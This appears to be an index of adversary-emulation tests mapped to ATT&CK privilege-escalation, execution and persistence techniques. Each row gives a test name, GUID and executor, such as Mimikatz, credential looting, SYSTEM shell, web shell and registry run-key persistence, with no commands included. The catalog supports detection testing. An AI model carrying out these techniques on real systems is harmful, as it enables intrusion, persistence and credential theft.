476 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
477 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
478 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
479 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
480 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
481 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
482 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
483 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
484 privilege-escalation T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
485 privilege-escalation T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
486 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
487 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
488 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
489 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
490 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
491 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
492 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
493 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
494 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
495 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
496 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
497 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
498 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
499 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
500 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
501 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
502 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
503 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
504 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
505 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
506 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
507 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
508 execution T1059.007 Command and Scripting Interpreter: JavaScript 1 JScript execution to gather local computer information via cscript 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 command_prompt
509 execution T1059.007 Command and Scripting Interpreter: JavaScript 2 JScript execution to gather local computer information via wscript 0709945e-4fec-4c49-9faf-c3c292a74484 command_prompt
510 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
511 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
512 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
513 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
514 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
515 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
516 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
517 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
518 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
519 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
520 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
521 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
522 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
523 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
524 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
525 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
526 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
527 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
528 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
529 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
530 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
531 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
532 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
533 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
534 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
535 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
536 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
537 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
538 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
539 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
540 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
541 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
542 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
543 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
544 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
545 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
546 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
547 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
548 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
549 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
550 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
551 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
552 execution T1559 Inter-Process Communication 1 Cobalt Strike Artifact Kit pipe bd13b9fc-b758-496a-b81a-397462f82c72 command_prompt
553 execution T1559 Inter-Process Communication 2 Cobalt Strike Lateral Movement (psexec_psh) pipe 830c8b6c-7a70-4f40-b975-8bbe74558acd command_prompt
554 execution T1559 Inter-Process Communication 3 Cobalt Strike SSH (postex_ssh) pipe d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6 command_prompt
555 execution T1559 Inter-Process Communication 4 Cobalt Strike post-exploitation pipe (4.2 and later) 7a48f482-246f-4aeb-9837-21c271ebf244 command_prompt
556 execution T1559 Inter-Process Communication 5 Cobalt Strike post-exploitation pipe (before 4.2) 8dbfc15c-527b-4ab0-a272-019f469d367f command_prompt
557 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
558 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
559 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
560 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
561 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
562 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
563 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
564 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
565 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
566 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
567 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
568 execution T1569.002 System Services: Service Execution 5 Use RemCom to execute a command on a remote host a5d8cdeb-be90-43a9-8b26-cc618deac1e0 command_prompt
569 execution T1569.002 System Services: Service Execution 6 Snake Malware Service Create b8db787e-dbea-493c-96cb-9272296ddc49 command_prompt
570 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
571 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
572 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
573 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
574 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
575 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
576 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
577 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
578 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
579 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
580 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
581 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
582 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
583 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
584 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
585 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
586 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
587 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
588 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
589 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
590 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
591 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
592 persistence T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
593 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
594 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
595 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (XLL) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
596 persistence T1137.006 Office Application Startup: Add-ins 2 Persistent Code Execution Via Excel Add-in File (XLL) 9c307886-9fef-41d5-b344-073a0f5b2f5f powershell
597 persistence T1137.006 Office Application Startup: Add-ins 3 Persistent Code Execution Via Word Add-in File (WLL) 95408a99-4fa7-4cd6-a7ef-cb65f86351cf powershell
598 persistence T1137.006 Office Application Startup: Add-ins 4 Persistent Code Execution Via Excel VBA Add-in File (XLAM) 082141ed-b048-4c86-99c7-2b8da5b5bf48 powershell
599 persistence T1137.006 Office Application Startup: Add-ins 5 Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) f89e58f9-2b49-423b-ac95-1f3e7cfd8277 powershell
600 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
601 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
602 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
603 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
604 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
605 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
606 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
607 persistence T1176 Browser Extensions 5 Google Chrome Load Unpacked Extension With Command Line 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
608 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
609 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
610 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
611 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
612 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
613 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
614 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
615 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
616 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
617 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
618 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
619 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
620 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
621 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
622 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
623 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
624 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
625 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
626 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
627 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
628 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
629 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
630 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
631 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
632 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
633 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
634 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
635 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
636 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
637 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
638 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
639 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
640 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
641 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
642 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
643 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
644 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
645 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
646 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
647 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
648 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
649 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
650 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
651 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
652 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
653 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
654 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
655 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
656 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
657 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
658 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
659 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
660 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
661 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
662 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
663 persistence T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
664 persistence T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
665 persistence T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
666 persistence T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
667 persistence T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
